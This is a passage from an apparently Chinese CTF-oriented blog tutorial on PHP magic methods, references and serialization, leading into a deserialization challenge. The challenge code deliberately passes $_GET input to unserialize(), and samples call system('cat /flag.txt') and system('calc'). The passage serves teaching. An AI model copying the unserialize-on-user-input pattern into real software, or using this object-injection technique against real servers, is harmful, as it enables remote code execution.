;\n$test::callxxx('a');\n?&gt;\n\n&lt;!-- callxxx,a --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"gIpxw\">__get()<\/h4>\n\n\n\n<p id=\"u254769d8\">\u8c03\u7528\u7684\u6210\u5458\u5c5e\u6027\u4e0d\u5b58\u5728\u3002__get() \/\/\u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e\u6216\u8005\u4e0d\u5b58\u5728\u8fd9\u4e2a\u952e\u90fd\u4f1a\u8c03\u7528\u6b64\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"uad1f6f71\">\/\/call\u548cget\u7684\u533a\u522b\u5c31\u662f\uff0ccall\u662f\u8bbf\u95ee\u4e0d\u5b58\u5728\/\u4e0d\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\uff0cget\u662f\u4e0d\u5b58\u5728\/\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027<\/p>\n\n\n\n<pre id=\"Ttgxg\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $var1;\n    public function __get($arg1)\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\n$test -&gt;var2;\n?&gt;\n\n&lt;!-- var2 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"vRzSl\">__set()<\/h4>\n\n\n\n<p id=\"u25499eee\">__set\u9b54\u672f\u65b9\u6cd5\u662fPHP\u4e2d\u7528\u4e8e\u5904\u7406\u5c5e\u6027\u8bbe\u7f6e\u7684\u4e00\u4e2a\u7279\u6b8a\u65b9\u6cd5\u3002\u5f53\u5c1d\u8bd5\u8bbe\u7f6e\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u65f6\uff0cPHP\u4f1a\u81ea\u52a8\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5\u3002<\/p>\n\n\n\n<pre id=\"xBRn2\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $var1;\n    public function __set($arg1 ,$arg2)\n    {\n        echo  $arg1.','.$arg2;\n    }\n}\n$test = new User() ;\n$test -&gt;var2=1;\n?&gt;\n\n&lt;!-- var2,1 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"IGwrn\">__isset()<\/h4>\n\n\n\n<p id=\"u8ee4638c\">\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u4f7f\u7528 isset() \u6216 empty() \u65f6\uff0c__isset() \u4f1a\u88ab\u8c03\u7528\u3002\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"jvhZC\" class=\"wp-block-code\"><code>&lt;?php\nclass User 
{\n    private $var;\n    public function __isset($arg1 )\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\nisset($test-&gt;var);\n?&gt;\n\n&lt;!-- var --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"MjVXF\">__unset()<\/h4>\n\n\n\n<p id=\"ucfce0ef0\">\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"GV0KI\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $var;\n    public function __unset($arg1 )\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\nunset($test-&gt;var);\n?&gt;\n\n&lt;!-- var --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"uv1ZV\">__clone()<\/h4>\n\n\n\n<p id=\"ufad846b3\">\u5f53\u4f7f\u7528 clone \u5173\u952e\u5b57\u62f7\u8d1d\u5b8c\u6210\u4e00\u4e2a\u5bf9\u8c61\u540e\uff0c\u65b0\u5bf9\u8c61\u4f1a\u81ea\u52a8\u8c03\u7528\u5b9a\u4e49\u7684\u9b54\u672f\u65b9\u6cd5 __clone()<\/p>\n\n\n\n<pre id=\"Mv8QH\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $var;\n    public function __clone( )\n    {\n        echo  \"__clone test\";\n          }\n}\n$test = new User() ;\n$newclass = clone($test)\n?&gt;\n&lt;!-- __clone test --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BjGtY\"><strong>__autoload()<\/strong><\/h4>\n\n\n\n<p id=\"u46eacb67\">\u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"NLFDa\" class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u6ce8\u610f\uff1a__autoload() \u5728 PHP 7.2.0 \u540e\u5df2\u5f03\u7528\nfunction __autoload($className) {\n    echo \"\u5c1d\u8bd5\u81ea\u52a8\u52a0\u8f7d\u7c7b: \" . 
$className;\n    \/\/ \u8fd9\u91cc\u53ef\u4ee5\u5b9e\u73b0\u7c7b\u6587\u4ef6\u7684\u81ea\u52a8\u52a0\u8f7d\u903b\u8f91\n}\n$test = new NonExistentClass(); \/\/ \u8fd9\u91cc\u89e6\u53d1\n?&gt;\n&lt;!-- \u5c1d\u8bd5\u81ea\u52a8\u52a0\u8f7d\u7c7b: NonExistentClass --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"X70HD\"><strong>__debugInfo()<\/strong><\/h4>\n\n\n\n<p id=\"u586ad714\">\u4f7f\u7528 var_dump() \u6253\u5370\u5bf9\u8c61\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"paWmx\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $password = 'secret123';\n    public $username = 'admin';\n    \n    public function __debugInfo() {\n        return &#91;\n            'username' =&gt; $this-&gt;username,\n            'info' =&gt; '\u9690\u85cf\u654f\u611f\u4fe1\u606f\uff0c\u4e0d\u663e\u793apassword'\n        ];\n    }\n}\n$test = new User();\n\/\/ \u8fd9\u91cc\u89e6\u53d1\nvar_dump($test);\n?&gt;\n&lt;!-- object(User)#1 (2) { &#91;\"username\"]=&gt; string(5) \"admin\" &#91;\"info\"]=&gt; string(36) \"\u9690\u85cf\u654f\u611f\u4fe1\u606f\uff0c\u4e0d\u663e\u793apassword\" } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"PVlWd\"><strong>__set_state()<\/strong><\/h4>\n\n\n\n<p id=\"uee39a845\">\u4f7f\u7528 var_export() \u5bfc\u51fa\u7c7b\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"aiA2e\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    public $age;\n    \n    public static function __set_state($properties) {\n        $obj = new User();\n        $obj-&gt;username = $properties&#91;'username'];\n        $obj-&gt;age = $properties&#91;'age'] + 1; \/\/ \u53ef\u4ee5\u5728\u8fd9\u91cc\u8fdb\u884c\u4e00\u4e9b\u5904\u7406\n        return $obj;\n    }\n}\n$test = new User();\n$test-&gt;username = 'benben';\n$test-&gt;age = 20;\n\/\/ \u8fd9\u91cc\u89e6\u53d1\neval('$newObj = ' . var_export($test, true) . 
';');\nvar_dump($newObj);\n?&gt;\n&lt;!-- object(User)#2 (2) { &#91;\"username\"]=&gt; string(6) \"benben\" &#91;\"age\"]=&gt; int(21) } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"QNNzO\"><strong>__serialize() \u548c __unserialize()<\/strong><\/h4>\n\n\n\n<p id=\"udb3dd839\">PHP 7.4 \u65b0\u589e\u7684\u5e8f\u5217\u5316\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"WDFlA\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    private $password;\n    \n    public function __construct($username, $password) {\n        $this-&gt;username = $username;\n        $this-&gt;password = $password;\n    }\n    \n    \/\/ PHP 7.4+ \u65b0\u589e\uff0c\u4f18\u5148\u7ea7\u9ad8\u4e8e __sleep()\n    public function __serialize(): array {\n        return &#91;\n            'user' =&gt; $this-&gt;username,\n            'pass_hash' =&gt; md5($this-&gt;password) \n        ];\n    }\n    \n    public function __unserialize(array $data): void {\n        $this-&gt;username = $data&#91;'user'];\n        $this-&gt;password = 'restored'; \/\/ \u53cd\u5e8f\u5217\u5316\u65f6\u7684\u521d\u59cb\u5316\n    }\n}\n$test = new User('admin', '123456');\n$ser = serialize($test); \/\/ \u8fd9\u91cc\u89e6\u53d1 __serialize()\n$new = unserialize($ser); \/\/ \u8fd9\u91cc\u89e6\u53d1 __unserialize()\nvar_dump($ser);\n?&gt;\n&lt;!-- string(81) \"O:4:\"User\":2:{s:4:\"user\";s:5:\"admin\";s:9:\"pass_hash\";s:32:\"e10adc3949ba59abbe56e057f20f883e\";}\" --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ohZpM\">PHP \u533f\u540d\u7c7b<\/h3>\n\n\n\n<pre id=\"BP80d\" class=\"wp-block-code\"><code>&lt;?php\n$a = new class {\n    function getflag()\n    {\n        system('cat \/flag.txt');\n    }\n};\n\necho get_class($a);\n\/\/class@anonymous+%00+php\u6587\u4ef6\u8def\u5f84+:\u884c\u6570$\u5217\u6570    \/\/linux\n\/\/class@anonymous+%00+php\u6587\u4ef6\u8def\u5f84+\u5185\u5b58\u5730\u5740  \/\/windows<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" 
id=\"XBmlQ\">PHP \u52a8\u6001\u5c5e\u6027<\/h3>\n\n\n\n<p id=\"u3d4d54cb\">\u52a8\u6001\u5c5e\u6027\u662f\u6307\u5728\u5bf9\u8c61\u5b9e\u4f8b\u5316\u540e\uff0c\u76f4\u63a5\u8d4b\u503c\u7ed9<strong>\u7c7b\u5b9a\u4e49\u4e2d\u4e0d\u5b58\u5728<\/strong>\u7684\u5c5e\u6027\u3002\u8fd9\u662f PHP \u7075\u6d3b\u6027\u7684\u4e00\u5927\u4f53\u73b0\uff0c\u4e5f\u662f\u53cd\u5e8f\u5217\u5316\u5229\u7528\u7684\u6838\u5fc3\u3002<\/p>\n\n\n\n<p id=\"ueb79590d\">\u5728 PHP \u5185\u90e8\uff0c\u5bf9\u8c61\u7684\u5c5e\u6027\u5b58\u50a8\u5728\u4e00\u4e2a HashTable \u4e2d\u3002\u5982\u679c\u662f\u7c7b\u5b9a\u4e49\u7684\u5c5e\u6027\uff0c\u5b83\u4eec\u6709\u56fa\u5b9a\u7684 offset\uff1b\u5982\u679c\u662f\u52a8\u6001\u5c5e\u6027\uff0c\u5219\u4f1a\u8ffd\u52a0\u5230\u8fd9\u4e2a HashTable \u4e2d\u3002 \u4ece PHP 8.2 \u5f00\u59cb\uff0c\u52a8\u6001\u5c5e\u6027\u88ab\u5e9f\u5f03\uff08Deprecated\uff09\uff0c\u9664\u975e\u7c7b\u4f7f\u7528\u4e86 #[AllowDynamicProperties] \u6ce8\u89e3\u6216\u7ee7\u627f\u81ea stdClass\u3002\u4f46\u5728 PHP 5.x &#8211; 8.1 \u4e2d\uff0c\u8fd9\u662f\u9ed8\u8ba4\u5141\u8bb8\u7684\u3002<\/p>\n\n\n\n<pre id=\"JtZye\" class=\"wp-block-code\"><code>class Phantom {}\n$obj = new Phantom();\n$obj-&gt;newProp = \"Hacker\"; \/\/ \u52a8\u6001\u521b\u5efa\u5c5e\u6027\n\/\/ \u5e8f\u5217\u5316\u540e\uff1aO:7:\"Phantom\":1:{s:7:\"newProp\";s:6:\"Hacker\";}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ZfWnN\">php\u5f15\u7528<\/h3>\n\n\n\n<p id=\"u6a3a8a5e\">\u5728 PHP \u4e2d\uff0c\u5f15\u7528\u610f\u5473\u7740\u4e24\u4e2a\u4e0d\u540c\u7684\u53d8\u91cf\u540d\u8bbf\u95ee\u540c\u4e00\u4e2a\u53d8\u91cf\u5185\u5bb9<\/p>\n\n\n\n<p id=\"ucad2cd90\"><strong>\u7b26\u53f7<\/strong>\uff1a<code>&amp;<\/code><\/p>\n\n\n\n<p id=\"u1f517bbb\">\u4e00\u65e6\u5efa\u7acb\u5f15\u7528\uff0c\u6539\u53d8\u5176\u4e2d\u4e00\u4e2a\u53d8\u91cf\u7684\u503c\uff0c\u53e6\u4e00\u4e2a\u53d8\u91cf\u7684\u503c\u4e5f\u4f1a<strong>\u7acb\u5373<\/strong>\u6539\u53d8\u3002<\/p>\n\n\n\n<p 
id=\"u13e60798\"><strong>\u5185\u5b58\u5171\u4eab<\/strong>\uff1a\u5b83\u4eec\u6307\u5411\u540c\u4e00\u4e2a Zval (Zend Value) \u7ed3\u6784\u3002<\/p>\n\n\n\n<pre id=\"o3cZa\" class=\"wp-block-code\"><code>&lt;?php\nclass Phantom {\n    public $A;\n    public $B;\n}\n\n$obj = new Phantom();\n$obj-&gt;A = \"secret\";\n\n\/\/ \u3010\u5173\u952e\u6b65\u9aa4\u3011\u5c06 B \u8bbe\u7f6e\u4e3a A \u7684\u5f15\u7528\n$obj-&gt;B = &amp;$obj-&gt;A; \n\necho serialize($obj);\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"68\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=68\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38.png\" data-orig-size=\"1153,661\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-300x172.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png\" 
data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-68\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u8f35355a\">s:1:&#8221;A&#8221;;s:6:&#8221;secret&#8221;;\uff1a\u5c5e\u6027 A \u88ab\u6b63\u5e38\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n<p id=\"ufe25dafa\">s:1:&#8221;B&#8221;;R:2;\uff1a\u5c5e\u6027 B \u6ca1\u6709\u518d\u6b21\u5b58\u50a8 &#8220;secret&#8221;\uff0c\u800c\u662f\u6307\u5411\u4e86\u7b2c 2 \u4e2a\u53cd\u5e8f\u5217\u5316\u7684\u503c\uff08\u8fd9\u91cc\u6307\u7684\u5c31\u662f\u5c5e\u6027 A \u7684\u503c\uff09\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"IWx12\">php\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<p id=\"ud72bc58d\">\u5728php\u4e2d\uff0c\u5c06\u6570\u636e\u8fdb\u884c\u5e8f\u5217\u5316\u7684\u51fd\u6570\u662fserialize\uff0c\u8fd9\u662f\u4e00\u79cd\u5b58\u50a8\u6570\u636e\u7684\u65b9\u6cd5\uff1b\u5c06\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u53cd\u5e8f\u5217\u5316\u7684\u51fd\u6570\u662funserialize<\/p>\n\n\n\n<p id=\"u637b6c5b\">\u5728 PHP 7.4 \u4e2d\u65b0\u589e\u4e86__serialize() \u548c __unserialize()\u9b54\u672f\u65b9\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"539\" data-attachment-id=\"69\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=69\" 
data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39.png\" data-orig-size=\"1919,1011\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-300x158.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-69\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u34525638\">\u5728\u524d\u9762\u5df2\u7ecf\u4ecb\u7ecd\u8fc7\u5e8f\u5217\u5316\u4e86<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"H0Q3g\">\u4f8b\u98981<\/h4>\n\n\n\n<p id=\"u890b6b1e\">\u8fd9\u91cc\u6765\u770b\u4e00\u9053\u4f8b\u9898<\/p>\n\n\n\n<pre id=\"tK2wZ\" class=\"wp-block-code\"><code>&lt;?php\nclass NSS {\n    var $name;\n\n    function __destruct() {\n        if ($this-&gt;name === 'ctf') {\n            echo getenv('FLAG');\n        }\n    }\n}\n\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p id=\"u70e84803\">\u5982\u679c$this-&gt;name === &#8216;ctf&#8217; \u90a3\u4e48\u5c31\u8f93\u51faenv\u4e2d\u7684flag<\/p>\n\n\n\n<p 
id=\"u3105ef28\">\u8fd8\u8bb0\u5f97__destruct\u7684\u89e6\u53d1\u65b9\u6cd5\u5417\uff0c\u6ca1\u9519\u662f\u5728\u5bf9\u8c61\u9500\u6bc1\u7684\u65f6\u5019<\/p>\n\n\n\n<p id=\"uac4b1099\">\u90a3\u4e48\u4ec0\u4e48\u65f6\u5019\u4f1a\u9500\u6bc1\u5bf9\u8c61\u5462\uff0c\u5c31\u662f\u5728\u7528\u5b8c\u4e4b\u540e\uff0c\u4e5f\u5c31\u662f\u53cd\u5e8f\u5217\u5316 unserialize\u4e4b\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"794\" height=\"441\" data-attachment-id=\"70\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=70\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" data-orig-size=\"794,441\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40-300x167.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-70\"  sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue6223400\">\u6211\u4eec\u53ef\u4ee5\u5728\u672c\u5730\u8c03\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<p id=\"u5d892b75\">\u9996\u5148\u8ba9\u4ed6\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6name=ctf<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"291\" height=\"80\" data-attachment-id=\"71\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=71\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-orig-size=\"291,80\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-71\"\/><\/div><\/figure>\n\n\n\n<p id=\"u73422267\">\u7136\u540e\u901a\u8fc7serialize\u8f93\u51faNSS\u8fd9\u4e2a\u7c7b\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"650\" data-attachment-id=\"72\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=72\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" data-orig-size=\"834,650\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42-300x234.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-72\"  sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1478aafa\">\u5c06\u8fd9\u4e2a\u503c\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\uff0c\u4e3a\u4e86\u5728\u672c\u5730\u76f4\u89c2\u4e00\u4e9b\uff0c\u6211\u5c06echo getenv(&#8216;FLAG&#8217;);\u6539\u6210system(&#8220;calc&#8221;);<\/p>\n\n\n\n<p id=\"u8c5e44ff\">\u8fdc\u7a0b\u6253\u8fc7\u53bb\u662f\u4e00\u6837\u7684\u6548\u679c\uff0c\u56e0\u4e3a\u90fd\u662f\u89e6\u53d1__destruct\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u6267\u884c\u91cc\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"751\" data-attachment-id=\"73\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=73\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43.png\" data-orig-size=\"1179,865\" data-comments-opened=\"1\" 